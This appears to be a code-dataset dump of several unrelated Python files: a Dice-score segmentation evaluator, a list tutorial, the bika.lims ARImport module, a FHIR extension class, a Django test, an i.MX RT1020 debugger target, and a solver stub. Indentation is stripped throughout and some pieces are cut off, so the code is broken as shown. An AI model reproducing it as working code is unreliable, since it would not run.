dc3D = []
for i in range(YP.shape[0]):
yp = YP[i,...]
ygt = Y[i,...]
if len(yp.shape) > 3:
dcSlice=[]
for j in range(yp.shape[2]):
cenp = yp[:,:,j,:]
gtp = ygt[:,:,j,:]
dcSlice.append(m.dice_coef(gtp,cenp,threshold=segThreshold))
dc.append(dcSlice)
dc3D.append(m.dice_coef(ygt, yp,threshold=segThreshold))
if len(yp.shape) > 3:
dc = np.array(dc)
print("Mean DC : \n")
print(np.mean(dc,axis=0))
dc3D = np.array(dc3D)
print("\nMean 3D DC : \n")
print(np.mean(dc3D))
'''
db = h5py.File( os.path.join('../predictedMasks','pred_' + dbName), mode='w')
db.create_dataset("slice", X.shape, X.dtype)
db.create_dataset("maskGT", Y.shape, Y.dtype)
db.create_dataset("maskPred", YP.shape, YP.dtype)
db.create_dataset("case", cases.shape, cases.dtype)
db['slice'][...] = X[...]
db['maskGT'][...] = Y[...]
db['maskPred'][...] = YP[...]
db['case'][...] = cases[...]
db.close()
k = 0
i = 2
while k != 'q':
x = np.expand_dims(X[i,:],0)
yp = np.array(YP[i,...])
yp = np.reshape(yp, (yp.shape[0], yp.shape[0]))
yp[yp < 0.5] = 0
yp[yp>=0.5] = 1
ygt = np.reshape(Y[i, :], (yp.shape[0], yp.shape[0]))
dc = K.eval(m.dice_coef(ygt,yp))
print("\nDice Coefficient : %f" % dc)
plt.subplot(121)
plt.imshow(yp)
plt.title("Predicted Mask")
plt.subplot(122)
plt.imshow(ygt)
plt.title("Ground Truth")
plt.show()
k = raw_input(" d = next, a = previous, q = quit ")
if k == 'd':
i += 1
i %= len(Y)
elif k == 'a':
i-=1
i = 0 if i<0 else i
'''
|
StarcoderdataPython
|
6400322
|
l1 = [1 , 2, 3]
l2 = [4 , 5, 6]
print(l1 , l2)
l2.insert(0, 4) #inserir no indice 0 o valor 4
l2.append(5) #adicionar valor ao final
l3 = l1 + l2 #concatenar
l1.extend(l2) #concatenar
print(l3)
print(l1)
l4 = [ 5 , 6, 7, 8, 9]
del(l4[:2])
print(l4)
l4.pop() #remover ultimo
print(l4)
l5= list(range(1,10)) #transformar em iteravel com list
print( l5)
m = ''
for v in l5:
m += str(v)
print(m)
|
StarcoderdataPython
|
3454984
|
from AccessControl import ClassSecurityInfo
import csv
from DateTime.DateTime import DateTime
from Products.Archetypes.event import ObjectInitializedEvent
from Products.CMFCore.WorkflowCore import WorkflowException
from bika.lims import bikaMessageFactory as _
from bika.lims.browser import ulocalized_time
from bika.lims.config import PROJECTNAME
from bika.lims.content.bikaschema import BikaSchema
from bika.lims.content.analysisrequest import schema as ar_schema
from bika.lims.content.sample import schema as sample_schema
from bika.lims.idserver import renameAfterCreation
from bika.lims.interfaces import IARImport, IClient
from bika.lims.utils import tmpID
from bika.lims.vocabularies import CatalogVocabulary
from collective.progressbar.events import InitialiseProgressBar
from collective.progressbar.events import ProgressBar
from collective.progressbar.events import ProgressState
from collective.progressbar.events import UpdateProgressEvent
from Products.Archetypes import atapi
from Products.Archetypes.public import *
from Products.Archetypes.references import HoldingReference
from Products.Archetypes.utils import addStatusMessage
from Products.CMFCore.utils import getToolByName
from Products.CMFPlone.utils import _createObjectByType
from Products.DataGridField import CheckboxColumn
from Products.DataGridField import Column
from Products.DataGridField import DataGridField
from Products.DataGridField import DataGridWidget
from Products.DataGridField import DateColumn
from Products.DataGridField import LinesColumn
from Products.DataGridField import SelectColumn
from zope import event
from zope.event import notify
from zope.i18nmessageid import MessageFactory
from zope.interface import implements
from bika.lims.browser.widgets import ReferenceWidget as bReferenceWidget
import sys
import transaction
_p = MessageFactory(u"plone")
OriginalFile = FileField(
'OriginalFile',
widget=ComputedWidget(
visible=False
),
)
Filename = StringField(
'Filename',
widget=StringWidget(
label=_('Original Filename'),
visible=True
),
)
NrSamples = StringField(
'NrSamples',
widget=StringWidget(
label=_('Number of samples'),
visible=True
),
)
ClientName = StringField(
'ClientName',
searchable=True,
widget=StringWidget(
label=_("Client Name"),
),
)
ClientID = StringField(
'ClientID',
searchable=True,
widget=StringWidget(
label=_('Client ID'),
),
)
ClientOrderNumber = StringField(
'ClientOrderNumber',
searchable=True,
widget=StringWidget(
label=_('Client Order Number'),
),
)
ClientReference = StringField(
'ClientReference',
searchable=True,
widget=StringWidget(
label=_('Client Reference'),
),
)
Contact = ReferenceField(
'Contact',
allowed_types=('Contact',),
relationship='ARImportContact',
default_method='getContactUIDForUser',
referenceClass=HoldingReference,
vocabulary_display_path_bound=sys.maxint,
widget=ReferenceWidget(
label=_('Primary Contact'),
size=20,
visible=True,
base_query={'inactive_state': 'active'},
showOn=True,
popup_width='300px',
colModel=[{'columnName': 'UID', 'hidden': True},
{'columnName': 'Fullname', 'width': '100',
'label': _('Name')}],
),
)
Batch = ReferenceField(
'Batch',
allowed_types=('Batch',),
relationship='ARImportBatch',
widget=bReferenceWidget(
label=_('Batch'),
visible=True,
catalog_name='bika_catalog',
base_query={'review_state': 'open', 'cancellation_state': 'active'},
showOn=True,
),
)
CCContacts = DataGridField(
'CCContacts',
allow_insert=False,
allow_delete=False,
allow_reorder=False,
allow_empty_rows=False,
columns=('CCNamesReport',
'CCEmailsReport',
'CCNamesInvoice',
'CCEmailsInvoice'),
default=[{'CCNamesReport': [],
'CCEmailsReport': [],
'CCNamesInvoice': [],
'CCEmailsInvoice': []
}],
widget=DataGridWidget(
columns={
'CCNamesReport': LinesColumn('Report CC Contacts'),
'CCEmailsReport': LinesColumn('Report CC Emails'),
'CCNamesInvoice': LinesColumn('Invoice CC Contacts'),
'CCEmailsInvoice': LinesColumn('Invoice CC Emails')
}
)
)
SampleData = DataGridField(
'SampleData',
allow_insert=True,
allow_delete=True,
allow_reorder=False,
allow_empty_rows=False,
allow_oddeven=True,
columns=('ClientSampleID',
'SamplingDate',
'DateSampled',
'SamplePoint',
'SampleMatrix',
'SampleType', # not a schema field!
'ContainerType', # not a schema field!
'ReportDryMatter',
'Priority',
'Analyses', # not a schema field!
'Profiles' # not a schema field!
),
widget=DataGridWidget(
label=_('Samples'),
columns={
'ClientSampleID': Column('Sample ID'),
'SamplingDate': DateColumn('Sampling Date'),
'DateSampled': DateColumn('Date Sampled'),
'SamplePoint': SelectColumn(
'Sample Point', vocabulary='Vocabulary_SamplePoint'),
'SampleMatrix': SelectColumn(
'Sample Matrix', vocabulary='Vocabulary_SampleMatrix'),
'SampleType': SelectColumn(
'Sample Type', vocabulary='Vocabulary_SampleType'),
'ContainerType': SelectColumn(
'Container', vocabulary='Vocabulary_ContainerType'),
'ReportDryMatter': CheckboxColumn('Dry'),
'Priority': SelectColumn(
'Priority', vocabulary='Vocabulary_Priority'),
'Analyses': LinesColumn('Analyses'),
'Profiles': LinesColumn('Profiles'),
}
)
)
Errors = LinesField(
'Errors',
widget=LinesWidget(
label=_('Errors'),
rows=10,
)
)
schema = BikaSchema.copy() + Schema((
OriginalFile,
Filename,
NrSamples,
ClientName,
ClientID,
ClientOrderNumber,
ClientReference,
Contact,
CCContacts,
Batch,
SampleData,
Errors,
))
schema['title'].validators = ()
# Update the validation layer after change the validator in runtime
schema['title']._validationLayer()
class ARImport(BaseFolder):
security = ClassSecurityInfo()
schema = schema
displayContentsTab = False
implements(IARImport)
_at_rename_after_creation = True
def _renameAfterCreation(self, check_auto_id=False):
renameAfterCreation(self)
def guard_validate_transition(self):
"""We may only attempt validation if file data has been uploaded.
"""
data = self.getOriginalFile()
if data and len(data):
return True
def workflow_before_validate(self):
"""This function transposes values from the provided file into the
ARImport object's fields, and checks for invalid values.
If errors are found:
- Validation transition is aborted.
- Errors are stored on object and displayed to user.
"""
# Re-set the errors on this ARImport each time validation is attempted.
# When errors are detected they are immediately appended to this field.
self.setErrors([])
self.validate_headers()
self.validate_samples()
if self.getErrors():
addStatusMessage(self.REQUEST, _p('Validation errors.'), 'error')
transaction.commit()
self.REQUEST.response.write(
'<script>document.location.href="%s/edit"</script>' % (
self.absolute_url()))
self.REQUEST.response.write(
'<script>document.location.href="%s/view"</script>' % (
self.absolute_url()))
def at_post_edit_script(self):
workflow = getToolByName(self, 'portal_workflow')
trans_ids = [t['id'] for t in workflow.getTransitionsFor(self)]
if 'validate' in trans_ids:
workflow.doActionFor(self, 'validate')
def workflow_script_import(self):
"""Create objects from valid ARImport
"""
bsc = getToolByName(self, 'bika_setup_catalog')
workflow = getToolByName(self, 'portal_workflow')
client = self.aq_parent
title = _('Submitting AR Import')
description = _('Creating and initialising objects')
bar = ProgressBar(self, self.REQUEST, title, description)
notify(InitialiseProgressBar(bar))
profiles = [x.getObject() for x in bsc(portal_type='AnalysisProfile')]
gridrows = self.schema['SampleData'].get(self)
row_cnt = 0
for therow in gridrows:
row = therow.copy()
row_cnt += 1
# Create Sample
sample = _createObjectByType('Sample', client, tmpID())
sample.unmarkCreationFlag()
# First convert all row values into something the field can take
sample.edit(**row)
sample._renameAfterCreation()
event.notify(ObjectInitializedEvent(sample))
sample.at_post_create_script()
swe = self.bika_setup.getSamplingWorkflowEnabled()
if swe:
workflow.doActionFor(sample, 'sampling_workflow')
else:
workflow.doActionFor(sample, 'no_sampling_workflow')
part = _createObjectByType('SamplePartition', sample, 'part-1')
part.unmarkCreationFlag()
if swe:
workflow.doActionFor(part, 'sampling_workflow')
else:
workflow.doActionFor(part, 'no_sampling_workflow')
# Container is special... it could be a containertype.
container = self.get_row_container(row)
if container:
if container.portal_type == 'ContainerType':
containers = container.getContainers()
# XXX And so we must calculate the best container for this partition
part.edit(Container=containers[0])
# Profiles are titles, profile keys, or UIDS: convert them to UIDs.
newprofiles = []
for title in row['Profiles']:
objects = [x for x in profiles
if title in (x.getProfileKey(), x.UID(), x.Title())]
for obj in objects:
newprofiles.append(obj.UID())
row['Profiles'] = newprofiles
# BBB in bika.lims < 3.1.9, only one profile is permitted
# on an AR. The services are all added, but only first selected
# profile name is stored.
row['Profile'] = newprofiles[0] if newprofiles else None
# Same for analyses
newanalyses = set(self.get_row_services(row) +
self.get_row_profile_services(row))
row['Analyses'] = []
# get batch
batch = self.schema['Batch'].get(self)
if batch:
row['Batch'] = batch
# Add AR fields from schema into this row's data
row['ClientReference'] = self.getClientReference()
row['ClientOrderNumber'] = self.getClientOrderNumber()
row['Contact'] = self.getContact()
# Create AR
ar = _createObjectByType("AnalysisRequest", client, tmpID())
ar.setSample(sample)
ar.unmarkCreationFlag()
ar.edit(**row)
ar._renameAfterCreation()
for analysis in ar.getAnalyses(full_objects=True):
analysis.setSamplePartition(part)
ar.at_post_create_script()
if swe:
workflow.doActionFor(ar, 'sampling_workflow')
else:
workflow.doActionFor(ar, 'no_sampling_workflow')
ar.setAnalyses(list(newanalyses))
progress_index = float(row_cnt) / len(gridrows) * 100
progress = ProgressState(self.REQUEST, progress_index)
notify(UpdateProgressEvent(progress))
# document has been written to, and redirect() fails here
self.REQUEST.response.write(
'<script>document.location.href="%s"</script>' % (
self.absolute_url()))
def get_header_values(self):
"""Scrape the "Header" values from the original input file
"""
lines = self.getOriginalFile().data.splitlines()
reader = csv.reader(lines)
header_fields = header_data = []
for row in reader:
if not any(row):
continue
if row[0].strip().lower() == 'header':
header_fields = [x.strip() for x in row][1:]
continue
if row[0].strip().lower() == 'header data':
header_data = [x.strip() for x in row][1:]
break
if not (header_data or header_fields):
return None
if not (header_data and header_fields):
self.error("File is missing header row or header data")
return None
# inject us out of here
values = dict(zip(header_fields, header_data))
# blank cell from sheet will probably make it in here:
if '' in values:
del (values[''])
return values
def save_header_data(self):
"""Save values from the file's header row into their schema fields.
"""
client = self.aq_parent
headers = self.get_header_values()
if not headers:
return False
# Plain header fields that can be set into plain schema fields:
for h, f in [
('File name', 'Filename'),
('No of Samples', 'NrSamples'),
('Client name', 'ClientName'),
('Client ID', 'ClientID'),
('Client Order Number', 'ClientOrderNumber'),
('Client Reference', 'ClientReference')
]:
v = headers.get(h, None)
if v:
field = self.schema[f]
field.set(self, v)
del (headers[h])
# Primary Contact
v = headers.get('Contact', None)
contacts = [x for x in client.objectValues('Contact')]
contact = [c for c in contacts if c.Title() == v]
if contact:
self.schema['Contact'].set(self, contact)
else:
self.error("Specified contact '%s' does not exist; using '%s'"%
(v, contacts[0].Title()))
self.schema['Contact'].set(self, contacts[0])
del (headers['Contact'])
# CCContacts
field_value = {
'CCNamesReport': '',
'CCEmailsReport': '',
'CCNamesInvoice': '',
'CCEmailsInvoice': ''
}
for h, f in [
# csv header name DataGrid Column ID
('CC Names - Report', 'CCNamesReport'),
('CC Emails - Report', 'CCEmailsReport'),
('CC Names - Invoice', 'CCNamesInvoice'),
('CC Emails - Invoice', 'CCEmailsInvoice'),
]:
if h in headers:
values = [x.strip() for x in headers.get(h, '').split(",")]
field_value[f] = values if values else ''
del (headers[h])
self.schema['CCContacts'].set(self, [field_value])
if headers:
unexpected = ','.join(headers.keys())
self.error("Unexpected header fields: %s" % unexpected)
def get_sample_values(self):
"""Read the rows specifying Samples and return a dictionary with
related data.
keys are:
headers - row with "Samples" in column 0. These headers are
used as dictionary keys in the rows below.
prices - Row with "Analysis Price" in column 0.
total_analyses - Row with "Total analyses" in colmn 0
price_totals - Row with "Total price excl Tax" in column 0
samples - All other sample rows.
"""
res = {'samples': []}
lines = self.getOriginalFile().data.splitlines()
reader = csv.reader(lines)
next_rows_are_sample_rows = False
for row in reader:
if not any(row):
continue
if next_rows_are_sample_rows:
vals = [x.strip() for x in row]
if not any(vals):
continue
res['samples'].append(zip(res['headers'], vals))
elif row[0].strip().lower() == 'samples':
res['headers'] = [x.strip() for x in row]
elif row[0].strip().lower() == 'analysis price':
res['prices'] = \
zip(res['headers'], [x.strip() for x in row])
elif row[0].strip().lower() == 'total analyses':
res['total_analyses'] = \
zip(res['headers'], [x.strip() for x in row])
elif row[0].strip().lower() == 'total price excl tax':
res['price_totals'] = \
zip(res['headers'], [x.strip() for x in row])
next_rows_are_sample_rows = True
return res
def save_sample_data(self):
"""Save values from the file's header row into the DataGrid columns
after doing some very basic validation
"""
bsc = getToolByName(self, 'bika_setup_catalog')
keywords = self.bika_setup_catalog.uniqueValuesFor('getKeyword')
profiles = []
for p in bsc(portal_type='AnalysisProfile'):
p = p.getObject()
profiles.append(p.Title())
profiles.append(p.getProfileKey())
sample_data = self.get_sample_values()
if not sample_data:
return False
# columns that we expect, but do not find, are listed here.
# we report on them only once, after looping through sample rows.
missing = set()
# This contains all sample header rows that were not handled
# by this code
unexpected = set()
# Save other errors here instead of sticking them directly into
# the field, so that they show up after MISSING and before EXPECTED
errors = []
# This will be the new sample-data field value, when we are done.
grid_rows = []
row_nr = 0
for row in sample_data['samples']:
row = dict(row)
row_nr += 1
# sid is just for referring the user back to row X in their
# in put spreadsheet
gridrow = {'sid': row['Samples']}
del (row['Samples'])
# We'll use this later to verify the number against selections
if 'Total number of Analyses or Profiles' in row:
nr_an = row['Total number of Analyses or Profiles']
del (row['Total number of Analyses or Profiles'])
else:
nr_an = 0
try:
nr_an = int(nr_an)
except ValueError:
nr_an = 0
# TODO this is ignored and is probably meant to serve some purpose.
del (row['Price excl Tax'])
# ContainerType - not part of sample or AR schema
if 'ContainerType' in row:
title = row['ContainerType']
if title:
obj = self.lookup(('ContainerType',),
Title=row['ContainerType'])
if obj:
gridrow['ContainerType'] = obj[0].UID
del (row['ContainerType'])
if 'SampleMatrix' in row:
# SampleMatrix - not part of sample or AR schema
title = row['SampleMatrix']
if title:
obj = self.lookup(('SampleMatrix',),
Title=row['SampleMatrix'])
if obj:
gridrow['SampleMatrix'] = obj[0].UID
del (row['SampleMatrix'])
# match against sample schema
for k, v in row.items():
if k in ['Analyses', 'Profiles']:
continue
if k in sample_schema:
del (row[k])
if v:
try:
value = self.munge_field_value(
sample_schema, row_nr, k, v)
gridrow[k] = value
except ValueError as e:
errors.append(e.message)
# match against ar schema
for k, v in row.items():
if k in ['Analyses', 'Profiles']:
continue
if k in ar_schema:
del (row[k])
if v:
try:
value = self.munge_field_value(
ar_schema, row_nr, k, v)
gridrow[k] = value
except ValueError as e:
errors.append(e.message)
# Count and remove Keywords and Profiles from the list
gridrow['Analyses'] = []
for k, v in row.items():
if k in keywords:
del (row[k])
if str(v).strip().lower() not in ('', '0', 'false'):
gridrow['Analyses'].append(k)
gridrow['Profiles'] = []
for k, v in row.items():
if k in profiles:
del (row[k])
if str(v).strip().lower() not in ('', '0', 'false'):
gridrow['Profiles'].append(k)
if len(gridrow['Analyses']) + len(gridrow['Profiles']) != nr_an:
errors.append(
"Row %s: Number of analyses does not match provided value" %
row_nr)
grid_rows.append(gridrow)
self.setSampleData(grid_rows)
if missing:
self.error("SAMPLES: Missing expected fields: %s" %
','.join(missing))
for thing in errors:
self.error(thing)
if unexpected:
self.error("Unexpected header fields: %s" %
','.join(unexpected))
def get_batch_header_values(self):
"""Scrape the "Batch Header" values from the original input file
"""
lines = self.getOriginalFile().data.splitlines()
reader = csv.reader(lines)
batch_headers = batch_data = []
for row in reader:
if not any(row):
continue
if row[0].strip().lower() == 'batch header':
batch_headers = [x.strip() for x in row][1:]
continue
if row[0].strip().lower() == 'batch data':
batch_data = [x.strip() for x in row][1:]
break
if not (batch_data or batch_headers):
return None
if not (batch_data and batch_headers):
self.error("Missing batch headers or data")
return None
# Inject us out of here
values = dict(zip(batch_headers, batch_data))
return values
def create_or_reference_batch(self):
"""Save reference to batch, if existing batch specified
Create new batch, if possible with specified values
"""
client = self.aq_parent
batch_headers = self.get_batch_header_values()
if not batch_headers:
return False
# if the Batch's Title is specified and exists, no further
# action is required. We will just set the Batch field to
# use the existing object.
batch_title = batch_headers.get('title', False)
if batch_title:
existing_batch = [x for x in client.objectValues('Batch')
if x.title == batch_title]
if existing_batch:
self.setBatch(existing_batch[0])
return existing_batch[0]
# If the batch title is specified but does not exist,
# we will attempt to create the bach now.
if 'title' in batch_headers:
if 'id' in batch_headers:
del (batch_headers['id'])
if '' in batch_headers:
del (batch_headers[''])
batch = _createObjectByType('Batch', client, tmpID())
batch.processForm()
batch.edit(**batch_headers)
self.setBatch(batch)
def munge_field_value(self, schema, row_nr, fieldname, value):
"""Convert a spreadsheet value into a field value that fits in
the corresponding schema field.
- boolean: All values are true except '', 'false', or '0'.
- reference: The title of an object in field.allowed_types;
returns a UID or list of UIDs
- datetime: returns a string value from ulocalized_time
Tho this is only used during "Saving" of csv data into schema fields,
it will flag 'validation' errors, as this is the only chance we will
get to complain about these field values.
"""
field = schema[fieldname]
if field.type == 'boolean':
value = str(value).strip().lower()
value = '' if value in ['0', 'no', 'false', 'none'] else '1'
return value
if field.type == 'reference':
value = str(value).strip()
brains = self.lookup(field.allowed_types, Title=value)
if not brains:
brains = self.lookup(field.allowed_types, UID=value)
if not brains:
raise ValueError('Row %s: value is invalid (%s=%s)' % (
row_nr, fieldname, value))
if field.multiValued:
return [b.UID for b in brains] if brains else []
else:
return brains[0].UID if brains else None
if field.type == 'datetime':
try:
value = DateTime(value)
return ulocalized_time(
value, long_format=True, time_only=False, context=self)
except:
raise ValueError('Row %s: value is invalid (%s=%s)' % (
row_nr, fieldname, value))
return str(value)
def validate_headers(self):
"""Validate headers fields from schema
"""
pc = getToolByName(self, 'portal_catalog')
pu = getToolByName(self, "plone_utils")
client = self.aq_parent
# Verify Client Name
if self.getClientName() != client.Title():
self.error("%s: value is invalid (%s)." % (
'Client name', self.getClientName()))
# Verify Client ID
if self.getClientID() != client.getClientID():
self.error("%s: value is invalid (%s)." % (
'Client ID', self.getClientID()))
existing_arimports = pc(portal_type='ARImport',
review_state=['valid', 'imported'])
# Verify Client Order Number
for arimport in existing_arimports:
if arimport.UID == self.UID() \
or not arimport.getClientOrderNumber():
continue
arimport = arimport.getObject()
if arimport.getClientOrderNumber() == self.getClientOrderNumber():
self.error('%s: already used by existing ARImport.' %
'ClientOrderNumber')
break
# Verify Client Reference
for arimport in existing_arimports:
if arimport.UID == self.UID() \
or not arimport.getClientReference():
continue
arimport = arimport.getObject()
if arimport.getClientReference() == self.getClientReference():
self.error('%s: already used by existing ARImport.' %
'ClientReference')
break
# getCCContacts has no value if object is not complete (eg during test)
if self.getCCContacts():
cc_contacts = self.getCCContacts()[0]
contacts = [x for x in client.objectValues('Contact')]
contact_names = [c.Title() for c in contacts]
# validate Contact existence in this Client
for k in ['CCNamesReport', 'CCNamesInvoice']:
for val in cc_contacts[k]:
if val and val not in contact_names:
self.error('%s: value is invalid (%s)' % (k, val))
else:
cc_contacts = {'CCNamesReport': [],
'CCEmailsReport': [],
'CCNamesInvoice': [],
'CCEmailsInvoice': []
}
# validate Contact existence in this Client
for k in ['CCEmailsReport', 'CCEmailsInvoice']:
for val in cc_contacts.get(k, []):
if val and not pu.validateSingleNormalizedEmailAddress(val):
self.error('%s: value is invalid (%s)' % (k, val))
def validate_samples(self):
"""Scan through the SampleData values and make sure
that each one is correct
"""
bsc = getToolByName(self, 'bika_setup_catalog')
keywords = bsc.uniqueValuesFor('getKeyword')
profiles = []
for p in bsc(portal_type='AnalysisProfile'):
p = p.getObject()
profiles.append(p.Title())
profiles.append(p.getProfileKey())
row_nr = 0
for gridrow in self.getSampleData():
row_nr += 1
# validate against sample and ar schemas
for k, v in gridrow.items():
if k in ['Analysis', 'Profiles']:
break
if k in sample_schema:
try:
self.validate_against_schema(
sample_schema, row_nr, k, v)
continue
except ValueError as e:
self.error(e.message)
break
if k in ar_schema:
try:
self.validate_against_schema(
ar_schema, row_nr, k, v)
except ValueError as e:
self.error(e.message)
an_cnt = 0
for v in gridrow['Analyses']:
if v and v not in keywords:
self.error("Row %s: value is invalid (%s=%s)" %
('Analysis keyword', row_nr, v))
else:
an_cnt += 1
for v in gridrow['Profiles']:
if v and v not in profiles:
self.error("Row %s: value is invalid (%s=%s)" %
('Profile Title', row_nr, v))
else:
an_cnt += 1
if not an_cnt:
self.error("Row %s: No valid analyses or profiles" % row_nr)
def validate_against_schema(self, schema, row_nr, fieldname, value):
"""
"""
field = schema[fieldname]
if field.type == 'boolean':
value = str(value).strip().lower()
return value
if field.type == 'reference':
value = str(value).strip()
if field.required and not value:
raise ValueError("Row %s: %s field requires a value" % (
row_nr, fieldname))
if not value:
return value
brains = self.lookup(field.allowed_types, UID=value)
if not brains:
raise ValueError("Row %s: value is invalid (%s=%s)" % (
row_nr, fieldname, value))
if field.multiValued:
return [b.UID for b in brains] if brains else []
else:
return brains[0].UID if brains else None
if field.type == 'datetime':
try:
ulocalized_time(DateTime(value), long_format=True,
time_only=False, context=self)
except:
raise ValueError('Row %s: value is invalid (%s=%s)' % (
row_nr, fieldname, value))
return value
def lookup(self, allowed_types, **kwargs):
"""Lookup an object of type (allowed_types). kwargs is sent
directly to the catalog.
"""
at = getToolByName(self, 'archetype_tool')
for portal_type in allowed_types:
catalog = at.catalog_map.get(portal_type, [None])[0]
catalog = getToolByName(self, catalog)
kwargs['portal_type'] = portal_type
brains = catalog(**kwargs)
if brains:
return brains
def get_row_services(self, row):
"""Return a list of services which are referenced in Analyses.
values may be UID, Title or Keyword.
"""
bsc = getToolByName(self, 'bika_setup_catalog')
services = set()
for val in row.get('Analyses', []):
brains = bsc(portal_type='AnalysisService', getKeyword=val)
if not brains:
brains = bsc(portal_type='AnalysisService', title=val)
if not brains:
brains = bsc(portal_type='AnalysisService', UID=val)
if brains:
services.add(brains[0].UID)
else:
self.error("Invalid analysis specified: %s" % val)
return list(services)
def get_row_profile_services(self, row):
"""Return a list of services which are referenced in profiles
values may be UID, Title or ProfileKey.
"""
bsc = getToolByName(self, 'bika_setup_catalog')
services = set()
profiles = [x.getObject() for x in bsc(portal_type='AnalysisProfile')]
for val in row.get('Profiles', []):
objects = [x for x in profiles
if val in (x.getProfileKey(), x.UID(), x.Title())]
if objects:
for service in objects[0].getService():
services.add(service.UID())
else:
self.error("Invalid profile specified: %s" % val)
return list(services)
def get_row_container(self, row):
"""Return a sample container
"""
bsc = getToolByName(self, 'bika_setup_catalog')
val = row.get('Container', False)
if val:
brains = bsc(portal_type='Container', UID=row['Container'])
if brains:
brains[0].getObject()
brains = bsc(portal_type='ContainerType', UID=row['Container'])
if brains:
# XXX Cheating. The calculation of capacity vs. volume is not done.
return brains[0].getObject()
return None
def get_row_profiles(self, row):
bsc = getToolByName(self, 'bika_setup_catalog')
profiles = []
for profile_title in row.get('Profiles', []):
profile = bsc(portal_type='AnalysisProfile', title=profile_title)
profiles.append(profile)
return profiles
def Vocabulary_SamplePoint(self):
vocabulary = CatalogVocabulary(self)
vocabulary.catalog = 'bika_setup_catalog'
folders = [self.bika_setup.bika_samplepoints]
if IClient.providedBy(self.aq_parent):
folders.append(self.aq_parent)
return vocabulary(allow_blank=True, portal_type='SamplePoint')
def Vocabulary_SampleMatrix(self):
vocabulary = CatalogVocabulary(self)
vocabulary.catalog = 'bika_setup_catalog'
return vocabulary(allow_blank=True, portal_type='SampleMatrix')
def Vocabulary_SampleType(self):
vocabulary = CatalogVocabulary(self)
vocabulary.catalog = 'bika_setup_catalog'
folders = [self.bika_setup.bika_sampletypes]
if IClient.providedBy(self.aq_parent):
folders.append(self.aq_parent)
return vocabulary(allow_blank=True, portal_type='SampleType')
def Vocabulary_ContainerType(self):
vocabulary = CatalogVocabulary(self)
vocabulary.catalog = 'bika_setup_catalog'
return vocabulary(allow_blank=True, portal_type='ContainerType')
def Vocabulary_Priority(self):
vocabulary = CatalogVocabulary(self)
vocabulary.catalog = 'bika_setup_catalog'
return vocabulary(allow_blank=True, portal_type='ARPriority')
def error(self, msg):
errors = list(self.getErrors())
errors.append(msg)
self.setErrors(errors)
atapi.registerType(ARImport, PROJECTNAME)
|
StarcoderdataPython
|
3444077
|
<reponame>imranq2/SparkAutoMapper.FHIR
from typing import Optional
from spark_auto_mapper_fhir.extensions.extension_base import ExtensionBase
from spark_auto_mapper_fhir.fhir_types.date_time import FhirDateTime
from spark_auto_mapper_fhir.fhir_types.string import FhirString
class BaseExtensionItem(ExtensionBase):
# noinspection PyPep8Naming
def __init__(
self,
url: str,
valueString: Optional[FhirString] = None,
valueDateTime: Optional[FhirDateTime] = None,
include_null_properties: bool = True,
) -> None:
super().__init__(url=url, valueString=valueString, valueDateTime=valueDateTime)
super().include_null_properties(include_null_properties=True)
|
StarcoderdataPython
|
3434963
|
from django.test import TestCase
from accounts.models import UserProfile
from django.contrib.auth.models import User
from django.urls import reverse
class TestPost(TestCase):
@classmethod
def setUpTestData(cls):
test_user = User(username='test_user',
email='<EMAIL>',
password='password')
test_user.save()
def test_user_get_absolute_url(self):
user = User.objects.get(pk=1)
self.assertEqual(user.profile.get_absolute_url(), '/profile/test_user/')
def test_creation_user_profile(self):
user = User.objects.create(username='test')
self.assertTrue(UserProfile.objects.filter(user=user).exists())
|
StarcoderdataPython
|
1907678
|
#-----------------------------------------------------------------------------
"""
MIMXRT-1020-EVK Evaluation Kit (i.MX RT1020)
SoC: NXP PIMXRT1021DAG5A
SDRAM: ISSI IS42S16160J-6TLI
CODEC: Cirrus Logic WM8960G
Ethernet Phy: Microchip KSZ8081
"""
#-----------------------------------------------------------------------------
import cli
import cortexm
import mem
import soc
import vendor.nxp.imxrt as imxrt
import vendor.nxp.firmware as firmware
import vendor.nxp.flexspi as flexspi
#-----------------------------------------------------------------------------
soc_name = 'MIMXRT1021DAG5A'
prompt = 'rt1020'
#-----------------------------------------------------------------------------
# cmsis-dap device
default_itf = {
#'name': 'cmsis-dap',
'name': 'jlink',
}
#-----------------------------------------------------------------------------
class target:
"""rt1020 - NXP i.MX RT1020 Evaluation Kit"""
def __init__(self, ui, dbgio):
self.ui = ui
self.dbgio = dbgio
self.device = imxrt.get_device(self.ui, soc_name)
self.dbgio.connect(self.device.cpu_info.name, 'swd')
self.cpu = cortexm.cortexm(self, ui, self.dbgio, self.device)
self.device.bind_cpu(self.cpu)
self.mem = mem.mem(self.cpu)
self.fw = firmware.firmware(self.cpu)
self.flexspi = flexspi.flexspi(self.device)
self.menu_root = (
('cpu', self.cpu.menu, 'cpu functions'),
('da', self.cpu.cmd_disassemble, cortexm.help_disassemble),
('debugger', self.dbgio.menu, 'debugger functions'),
('exit', self.cmd_exit),
('flexspi', self.flexspi.menu, 'flexspi functions'),
('fw', self.fw.menu, 'firmware functions'),
('go', self.cpu.cmd_go),
('halt', self.cpu.cmd_halt),
('help', self.ui.cmd_help),
('history', self.ui.cmd_history, cli.history_help),
('map', self.device.cmd_map),
('mem', self.mem.menu, 'memory functions'),
('regs', self.cmd_regs, soc.help_regs),
('vtable', self.cpu.cmd_vtable),
)
self.ui.cli.set_root(self.menu_root)
self.set_prompt()
self.dbgio.cmd_info(self.ui, None)
def cmd_regs(self, ui, args):
"""display registers"""
if len(args) == 0:
self.cpu.cmd_regs(ui, args)
else:
self.device.cmd_regs(ui, args)
def set_prompt(self):
"""set the command prompt"""
indicator = ('*', '')[self.dbgio.is_halted()]
self.ui.cli.set_prompt('%s%s> ' % (prompt, indicator))
def cmd_exit(self, ui, args):
"""exit application"""
self.dbgio.disconnect()
ui.exit()
#-----------------------------------------------------------------------------
# QSPI Flash, IS25LP064A-JBLE
# FlexSPI_D3_A, GPIO_SD_B1_06
# FlexSPI_CLK, GPIO_SD_B1_07
# FlexSPI_D0_A, GPIO_SD_B1_08
# FlexSPI_D2_A, GPIO_SD_B1_09
# FlexSPI_D1_A, GPIO_SD_B1_10
# FlexSPI_SS0, GPIO_SD_B1_11
#-----------------------------------------------------------------------------
|
StarcoderdataPython
|
1721008
|
import math
import numpy as np
import matplotlib.pyplot as plt
import numerical_solvers as ns
'''General functions for formatting, printing and plotting output'''
def PrintHeader():
'''Prints header information'''
#TODO: (Extend and edit as you see fit to help you debug your methods)
print("x \t EXACT \t y(Euler) \t % Error(Euler) ")
print("--- \t ----- \t\t ----- \t\t -------------- ")
def PrintIt(x,y_e, y):
